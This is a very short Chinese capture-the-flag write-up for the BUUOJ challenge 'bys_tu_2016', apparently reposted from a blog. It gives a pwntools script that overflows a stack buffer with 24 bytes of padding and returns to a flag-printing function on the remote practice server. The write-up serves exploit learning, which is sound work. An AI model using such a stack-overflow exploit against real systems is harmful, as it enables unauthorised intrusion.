bys_tu_2016

exp脚本

栈溢出返回至 print flag 打印 flag ,太水了...

from pwn import *

io = remote('node3.buuoj.cn',26148)

payload = 'a' * 24 + p32(0x804856D)
io.sendline(payload)

io.interactive()


原文地址:https://www.cnblogs.com/luoleqi/p/12402758.html